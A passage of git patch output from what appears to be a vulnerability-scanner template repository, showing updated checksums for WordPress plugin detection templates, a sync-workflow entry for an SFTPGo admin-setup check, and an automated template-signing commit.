-http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:512336d0f0c76489a093451a218fc16e2218416c +http/technologies/wordpress/plugins/jetpack.yaml:b3733ab3fdc7ec300589cc4cf3a4ac17ca714db9 +http/technologies/wordpress/plugins/kadence-blocks.yaml:1ca5f884b21283f10e83436476cf96ab009a605e +http/technologies/wordpress/plugins/kirki.yaml:96cbbaa1e1f4355bc2fd1abceb807507f8456f86 +http/technologies/wordpress/plugins/leadin.yaml:bbd0a6560836dd2fb4080ce1dd3464448f673871 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:11053a41343bbd9a4af95d1346e7cc9c6f9ec6e0 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:a3c632178f635a99a00547c7a3ecb7b6dbb63c7b +http/technologies/wordpress/plugins/litespeed-cache.yaml:fdd79c33103a4553fe02eb41a205bbbad98dca4d +http/technologies/wordpress/plugins/loco-translate.yaml:a6dd1db28267410669a925d7f6a9567861dd0ce0 +http/technologies/wordpress/plugins/loginizer.yaml:6e5aa52d49284bc85de3a3ba57dd7ec3c9934b90 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:1b86ea0806bf00b4adf33640095b93448702c03a +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:7213fa9e85a7f641f25880b4ea27a735078c38aa +http/technologies/wordpress/plugins/mailpoet.yaml:3c39e584a7eec396dd32007e6011b62ccc8da9d3 +http/technologies/wordpress/plugins/maintenance.yaml:6c5c622e0f3cf24147d9d6a348bbaa0ea3fc9117 +http/technologies/wordpress/plugins/mainwp-child.yaml:1a861f0e3e7feafffdbb4796f22c34636faa07aa +http/technologies/wordpress/plugins/malcare-security.yaml:ada3688aeceab8ceb827baad31e78a6c2b73f08d +http/technologies/wordpress/plugins/megamenu.yaml:1ebee29b8cd3455cb87ece53269e43e935af9d97 +http/technologies/wordpress/plugins/members.yaml:d2fd6fd30bdae6ae744a6556241563075b73c011 +http/technologies/wordpress/plugins/meta-box.yaml:0523f28bebb233a734477ef3c0a259e52875a237 +http/technologies/wordpress/plugins/metform.yaml:430f7fa5e6bc2645b943b95d2b6b201ac2c321fb +http/technologies/wordpress/plugins/ml-slider.yaml:ef551a29a90a00e438773d14dc7f3f7eec699c2f +http/technologies/wordpress/plugins/newsletter.yaml:cfca9d671346d8cc81750bf14a659aaacf45a91c +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:77056038e5bb296d8da2554d05386e332f7dbb10 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:dc63b180ae81bb279042b4e991478f3764be816e +http/technologies/wordpress/plugins/ninja-forms.yaml:4bade33dfd6a5866a03348f0484914340aaa09cd +http/technologies/wordpress/plugins/ocean-extra.yaml:1874e6b0db08efac2af4554ff481ec7de44b37ad +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:d9e313bd63e35e596bedca4caa38eaab1da26c06 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:686909a5252995a710ad14401eebc6fb846304a4 +http/technologies/wordpress/plugins/optinmonster.yaml:97beac2da76d821ef91f9fbd68fe9e58529781ea +http/technologies/wordpress/plugins/otter-blocks.yaml:81000e41897bc6e3905af7a4330105a640dd4df4 +http/technologies/wordpress/plugins/password-protected.yaml:816c3601a17d030022539dbeae0645455af0c2e7 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b41fd685244bf00bb9e5051b3c1543e75db1cb3f http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:e3e339fce79c93e20c9b6ffa87fe8ed3bed3a965 +http/technologies/wordpress/plugins/pixelyoursite.yaml:4c90a886df0853b3ec420585ad5b1627eaed3451 +http/technologies/wordpress/plugins/polylang.yaml:7e1fab5cab013b7133efce856cbb3bb1c90483d4 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/popup-maker.yaml:dc00224b04ce76792c7bbe084b5e1fef1caca26a +http/technologies/wordpress/plugins/post-smtp.yaml:d7eb9a788149139947f21a236702d3e2cc1dddc9 +http/technologies/wordpress/plugins/post-types-order.yaml:be3e18e75704aadb7ef64036f421dfef4c357e35 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:a282f15c76fa57dcb5f733971488021a01e0cd61 +http/technologies/wordpress/plugins/pretty-link.yaml:3aef92ac7bd70d4c871dcd25cb24238a9ad25886 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:88135c77e981ba745002ea202af781077777b7a9 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:ca07a682ed99782b12816548c50b2539a91d9f80 +http/technologies/wordpress/plugins/redirection.yaml:692660f598828f403657fe7f42f59ee0635b315f +http/technologies/wordpress/plugins/redux-framework.yaml:494a3c7d2980c728f42f580fd7c3ba19e9da1466 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:79e4d0a18e9c0fc1456a0d442871aea1326419da +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:3e3d7efdfc11245b2066313e35fac02d7b4bc58c +http/technologies/wordpress/plugins/safe-svg.yaml:c9af3e98da6e6fced100b66639edd41148c61f95 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:ae241386327af47ed9354c0cf4d185900bb4eb29 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3083bc7bbb682353a7c7f853dd2910944fbc0bb4 +http/technologies/wordpress/plugins/sg-security.yaml:6a2b14ecb65fcff744ed94f3ddceb241a8c33d7c +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:c5b60ac33febc684dac88b36c4b0a830db229d9c +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:da3fc5ae37966c00e6a86c2d2dafa63a26471d0f +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:9619c9371868c4073837f33eb0e5c59a86fa73cb http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:84b06ad9830cfc4e06187bd4ad8283adaa064c12 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:e076ff1531af64ff3ce512d74cd688ead5344889 +http/technologies/wordpress/plugins/smart-slider-3.yaml:9846dd6a66bea01c4ec28946d09070066dcc6c66 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:8ef848eedca336018342db3b1ee59552560fcc78 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:1f8535ad38219522bb9a5a7b405a84930ef50653 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:04b1bf5ede21eb34aaac59e0222f9f4cd263021d +http/technologies/wordpress/plugins/sucuri-scanner.yaml:05690783ddb551790583ec4c5bcabaf9e786a9ce http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:aa27ccc7487bb40dbeed451dc8f6e25c6e731fff +http/technologies/wordpress/plugins/tablepress.yaml:b37a6741b7eded93048e63632ca43cd0554e4e9e +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:96d7da21306ac8e396e1b68befd7dbd83d5f5a5c +http/technologies/wordpress/plugins/templately.yaml:813bb411c8c29239dba837936b14a28f7e2169e7 +http/technologies/wordpress/plugins/the-events-calendar.yaml:70a17f9eaf634d0c19003a66633e9cdb62075921 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:fee317bab28021c61c5033bc768abdd2b74e7070 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:328ce6d4f9bc271f50cfca67930beb88ce2f9ae2 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:bca6908e0584efde21278cc77a728ff8a3fd21db +http/technologies/wordpress/plugins/under-construction-page.yaml:6741089a666de9a1d4cc26e262feb7ceccaf647c http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:d9b3126a0c750524506f4b25a6268884f697f42d http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:4cda12b6a8b41bdd55786526343d18fc59045274 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:89796302ff0e54237bddc81a25219aebea09f20c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:641826e59dd5e892d891ceba582a298502b05c7f +http/technologies/wordpress/plugins/webp-express.yaml:69484bb5b8dd0c2de6592d85ddb4ac0d6bb57051 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:270cea96bd271990a07cbe79260e1787a4cc9420 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6c0aebad65418437f8d1d0b66062e724bfcbc96c +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:b286b13f58ff4eb7f7d2eaa8bb93621f88829443 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:0b0fe9d5ac8b7d059a6709c2c25b173994d22578 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:44c2a50a94f0c653ded00895f844abc01342fa5d +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:79f624e2a40624890ea9a5d4668b17fb6b7b96c9 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:eea719d07a9885820c2c9f0cc35b780245f42668 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:7885ebfd2db3a4c52e669513fc942b751d351d3a +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:793409ed424b557d892f4b6d3bd7ac8e2618e659 +http/technologies/wordpress/plugins/woocommerce-services.yaml:b56c3be6390df503ea28be125498dbd3fe28be63 +http/technologies/wordpress/plugins/woocommerce.yaml:7f9e5aae786eb56ae01b6b7b4673bceb66d7628a +http/technologies/wordpress/plugins/wordfence.yaml:bea30c469e238d51eb0c5cf262c973b9ce9a3c55 +http/technologies/wordpress/plugins/wordpress-importer.yaml:3efeea8dac78a482ac3e0bbe24e57453d71241d6 +http/technologies/wordpress/plugins/wordpress-seo.yaml:5f438629df1d2d21a66d72b65b4d42c3b532733b http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:b1db4f5e4d7eef90ed58effeae7f9f85309a6609 +http/technologies/wordpress/plugins/wp-crontrol.yaml:2f41d46a025a0dcc5c7a6700729b27d67af837b5 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:d213257ba1b453edae059ccbd7a501468ae7374e +http/technologies/wordpress/plugins/wp-file-manager.yaml:3be7a8dfb67bfccdadf08806ffed5bcd7ee2cec6 +http/technologies/wordpress/plugins/wp-google-maps.yaml:4110ffdad84e798060e6f30d2c4e97ea464913cb +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:11307c95e09135746d4a87ecdd8de317ad55b030 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:8f957a1faeccc535d5e5840b8cc67642a731cd55 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:4728ab866d2d8613418e5fe0c10d913c7312fdf2 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:4d6d314a44e3c57391b6b9a6baffbf7f861576de +http/technologies/wordpress/plugins/wp-optimize.yaml:9a281421ccaabd04273b50971ab5cb5c31e61ee6 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:76d0d699c9c04743c0acc4e52a44c0b10bafa664 +http/technologies/wordpress/plugins/wp-reset.yaml:f343a8c49dbf81192d7fafa5de3026ffef004ea5 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:58f9375cdfe89b2aee57b0f11e812ca53dd1f7f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:aa01d9b279eb66fb7078b50d8f91ab404f8564a3 +http/technologies/wordpress/plugins/wp-seopress.yaml:c7761af629c436f4fd8cd1a9cfcdf28d9adafcee +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:e6f1255dac90cd2da15fcc3a9f39f776795e97c7 +http/technologies/wordpress/plugins/wp-smushit.yaml:c4fc07327029ba73ab63e7ffcb36432698898d3f +http/technologies/wordpress/plugins/wp-statistics.yaml:ba8175558fc308d2746d9ccfe49de8d2e86a117e +http/technologies/wordpress/plugins/wp-super-cache.yaml:16266d89a475871355ff8f4b79f5db7708d4341f http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5c4cd7af661e34bde63949f75cd8edadebce425c +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:0ef95bd22194c22a2b7c278105adcb4cdc114090 +http/technologies/wordpress/plugins/wpforms-lite.yaml:dd98e7d3c48ec05034b9c297868059f320ff343a +http/technologies/wordpress/plugins/wps-hide-login.yaml:7d1da2da9ccae2e41c8a6875a7b929b2e2773909 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:d49deea15d440d08d1f5dfa4a0003bba130980ce http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:7d97a618b2149438008dd429704674ee4002b491 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8910,7 +8911,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ff69142f688d96911e4085fec1fa85cc19ba5e18 +templates-checksum.txt:6d16f82dfcc20d4803ce8a7f93fb841a73001ec4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0446607d56e7248316158960924856081d43ce54 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 07:05:17 +0000 Subject: [PATCH 1527/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index be0e519367..ab39977fc4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -40,6 +40,7 @@ on: - 'http/misconfiguration/installer/adguard-installer.yaml' - 'http/misconfiguration/installer/freshrss-installer.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' + - 'http/misconfiguration/sftpgo-admin-setup.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' - 'http/technologies/wordpress/plugins/fluent-smtp.yaml' - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' From 038a313aa3b2d3cdca68be803f799f6b24185d53 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 07:06:17 +0000 Subject: [PATCH 1528/1841] Auto Template Signing [Tue Jul 23 07:06:17 UTC 2024] :robot: --- http/misconfiguration/sftpgo-admin-setup.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/sftpgo-admin-setup.yaml b/http/misconfiguration/sftpgo-admin-setup.yaml index e7b9573442..8e40e67e89 100644 --- a/http/misconfiguration/sftpgo-admin-setup.yaml +++ b/http/misconfiguration/sftpgo-admin-setup.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100cb184d53545e58eced5b1d9a3e2c9497c33a092937a7d9fc02f246a36ef33df00221008bf8e0a937d58c9fedfd123c2653afaf1700d070072f59dc0cdffc5968f3cf33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8685648e3d6caaa89e4218d0b882fd12745d9c7f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Jul 2024 12:37:11 +0530 Subject: [PATCH 1529/1841] updated payload --- 